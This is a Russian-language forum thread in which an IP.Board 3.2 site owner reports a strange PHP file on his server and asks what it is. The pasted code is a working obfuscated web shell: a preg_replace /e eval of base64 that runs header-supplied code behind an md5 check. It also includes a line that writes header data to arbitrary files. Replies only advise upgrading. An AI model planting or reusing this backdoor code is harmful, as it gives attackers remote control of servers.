Posted 5 января, 20159 yr comment_77568 Здравствуйте! Обнаружил PHP-файл, который не загружал на сервер, а также которого нет в исходном дистре IPB 3.2. Файл называется 5c258130.php. Файл нашел в 2 местах, содержимое отличается: В корне: <?php $_a3dc="x70x72x65x67x5fx72x65x70x6cx61x63x65";$_a3dc("x7cx2ex7cx65","x65x76x61x6cx28x27x65x76x61x6cx28x62x61x73x65x36x34x5fx64x65x63x6fx64x65x28x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7x22x29x29x3bx27x29",'.');?> В папке cache: ============================================================================== URL: /index.php/index.php Date: Tue, 20 Nov 2012 10:16:53 +0000 IP Address: 31.3.250.226 Time Taken: 0.04346 <?php file_put_contents(@$_SERVER[HTTP_FILENAME],base64_decode(@$_SERVER[HTTP_DATA]));echo md5(12345);?> ============================================================================== ============================================================================== ========================= END =================================== ========================= /index.php? =================================== ============================================================================== IP-адрес Великобритании. Я там никогда не хостился и сам из тех сетей не ходил. Сам не программер, оценить код PHP не могу. Тем более, что первый выглядит как упакованный или как какой-то брутфорсер. Внимание, вопросы: 1. Что это такое? 2. Как могло попасть (данные для входа никто не имел, пароли все мегастойкие)? 3. Что оно делало? Точная версия борды: IP.Board Version 3.2.0 (ID:32003) Edited 5 января, 20159 yr by EIKA Link to comment https://ipbmafia.ru/topic/10123-neponyatnyj-php-fajl-kotoryj-poyavilsya-sam-v-ipb-32/ Share on other sites Больше вариантов
5 января, 20159 yr comment_77570 Обновись до 3.4.6 Link to comment https://ipbmafia.ru/topic/10123-neponyatnyj-php-fajl-kotoryj-poyavilsya-sam-v-ipb-32/?&do=findComment&comment=77570 Share on other sites Больше вариантов
5 января, 20159 yr comment_77572 Обновись до 3.4.6 бессмысленные посты не нужно писать. Link to comment https://ipbmafia.ru/topic/10123-neponyatnyj-php-fajl-kotoryj-poyavilsya-sam-v-ipb-32/?&do=findComment&comment=77572 Share on other sites Больше вариантов
5 января, 20159 yr comment_77575 бессмысленные посты не нужно писать. Почему бессмысленные? IPB 3.2 забита уязвимостями Link to comment https://ipbmafia.ru/topic/10123-neponyatnyj-php-fajl-kotoryj-poyavilsya-sam-v-ipb-32/?&do=findComment&comment=77575 Share on other sites Больше вариантов
5 января, 20159 yr comment_77587 Почему бессмысленные? IPB 3.2 забита уязвимостями ТС спрашивает о файле, а не о том, как защитится. Link to comment https://ipbmafia.ru/topic/10123-neponyatnyj-php-fajl-kotoryj-poyavilsya-sam-v-ipb-32/?&do=findComment&comment=77587 Share on other sites Больше вариантов
5 января, 20159 yr Author comment_77603 Обновляться буду, но позже, ибо тут немного дизайн подпилен, уже не помню где и что я там пилил... Link to comment https://ipbmafia.ru/topic/10123-neponyatnyj-php-fajl-kotoryj-poyavilsya-sam-v-ipb-32/?&do=findComment&comment=77603 Share on other sites Больше вариантов
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.